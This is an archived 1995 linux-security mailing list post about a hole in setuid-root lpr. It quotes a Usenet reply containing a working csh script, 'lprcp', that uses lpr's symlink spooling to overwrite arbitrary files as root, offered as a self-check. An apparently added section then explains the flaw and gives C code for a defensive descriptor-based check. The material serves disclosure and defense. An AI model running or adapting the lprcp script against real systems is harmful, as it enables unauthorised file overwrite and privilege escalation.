[301] in linux-security and linux-alert archive
(fwd) Re: suid root lpr
daemon@ATHENA.MIT.EDU (Cy Schubert - BCSC Open Systems Gr)
Thu Jul 27 03:07:53 1995
Date: Mon, 24 Jul 1995 10:07:40 -0700
From: Cy Schubert - BCSC Open Systems Group <cschuber@uumail.gov.bc.ca>
To: owner-linux-security@tarsier.cv.nrao.edu
I've noticed a bit of discussion about the lpr/lpd hole in the
comp.security.unix newsgroup. As seen below, the problem affects other
commercial operating systems as well.
Regards,
Cy Schubert
Open Systems Support
BC Systems Corp.

Phone: (604)389-3827
OV/VM: BCSC02(CSCHUBER)
BITNET: CSCHUBER@BCSC02.BITNET
Internet: cschuber@uumail.gov.bc.ca
cschuber@bcsc02.gov.bc.ca

"Quit spooling around, JES do it."
> IUP Computer Science Club (compclub@grove.iup.edu) wrote:
> : I am wondering if lpr suid root is truly secure. Of course no suid root
> : program is truly secure, but does anyone know of any particular holes?
> : If there was a way to call a user made filter, instead of the printcap
> : called filter, could one achieve a shell escape from there? Is it
> : in any way possible to call a filter from other than within the untouchable
> : printcap ?
> : Any help would be appreciated. I know lpr need not be suid root, but I
> : am still curious. Thanks.
>
> It still is insecure. If you have a printer set up from many of the
> commercial or shareware Unix OSes (SunOS, Linux, BSD) you may or may not
> be vulnerable. Here is a program to see if you are or not. Run it from a
> non-privileged account and see what comes up.
>
> It's a relatively simple program, but gives you an idea of what damage
> could be done in somebody else's hands. Please don't use this to exploit
> or damage other people's systems - that isn't what I post it here for. I
> post it here so that people can be saved the headache and wasted time of
> a hacker intrusion.
>
> good luck,
>
> andrew
>
> #!/bin/csh -f
> #
> # Usage: lprcp from-file to-file
> #
>
> if ($#argv != 2) then
> echo Usage: lprcp from-file to-file
> exit 1
> endif
>
> # This link stuff allows us to overwrite unreadable files,
> # should we want to.
> echo x > /tmp/.tmp.$$
> lpr -q -s /tmp/.tmp.$$
> rm -f /tmp/.tmp.$$ # lpr's accepted it, point it
> ln -s $2 /tmp/.tmp.$$ # to where we really want
>
> @ s = 0
> while ( $s != 999) # loop 999 times
> lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
> @ s++
> if ( $s % 10 == 0 ) echo -n .
> end
> lpr $1 # incoming file
> # user becomes owner
> rm -f /tmp/.tmp.$$
> exit 0
>
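The script above works because the spooler, running as root, trusts the pathname of a spooled job after lpr has accepted it, so the symlink left behind by `lpr -s` can be repointed in the meantime. The following is an added example, not code from the original post or from any lpd implementation, of the daemon-side guard that closes that window: open the path, then validate the descriptor with fstat() (regular file, owned by the submitting user) so that re-targeting the link afterwards cannot change what gets read. Function names and the /tmp scenario are this example's own.

```c
#define _XOPEN_SOURCE 700            /* for mkstemp() and symlink() */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open PATH for reading on behalf of JOB_UID.  Returns an fd, or -1 with
 * errno = EPERM when what was opened is not a regular file owned by JOB_UID.
 * The path may be a symlink (that is how "lpr -s" jobs work); the check runs
 * on the descriptor, not the name, so repointing the link later changes nothing. */
int open_job_file(const char *path, uid_t job_uid)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != job_uid) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario: a file owned by the caller (a legitimate "lpr -s"
 * target), a symlink to it, a claimed owner that does not match, and a link
 * repointed at a directory.  Returns how many of the four checks behaved as
 * intended, so 4 means the guard works. */
int run_scenario(void)
{
    char file[] = "/tmp/lprcheck.XXXXXX", link[64];
    int fd = mkstemp(file), ok = 0;
    if (fd < 0) return -1;
    if (write(fd, "x\n", 2) != 2) { close(fd); unlink(file); return -1; }
    close(fd);
    snprintf(link, sizeof link, "%s.lnk", file);
    if ((fd = open_job_file(file, getuid())) >= 0) { close(fd); ok++; }   /* own file: allowed */
    if (symlink(file, link) == 0 && (fd = open_job_file(link, getuid())) >= 0) {
        close(fd); ok++;                                                  /* link to own file: allowed */
    }
    if (open_job_file(file, getuid() + 1) < 0 && errno == EPERM) ok++;    /* owner mismatch: refused */
    unlink(link);
    if (symlink("/", link) == 0 && open_job_file(link, getuid()) < 0 && errno == EPERM)
        ok++;                                                             /* repointed at a directory: refused */
    unlink(link); unlink(file);
    return ok;
}
```

The same idea applies to any privileged service that accepts a user-supplied path: validate the object you opened, never the name you were given.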